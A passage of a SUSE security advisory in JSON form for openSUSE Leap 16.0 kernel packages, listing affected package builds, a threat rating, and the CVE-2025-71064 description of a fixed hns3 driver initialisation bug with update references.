"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68822"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
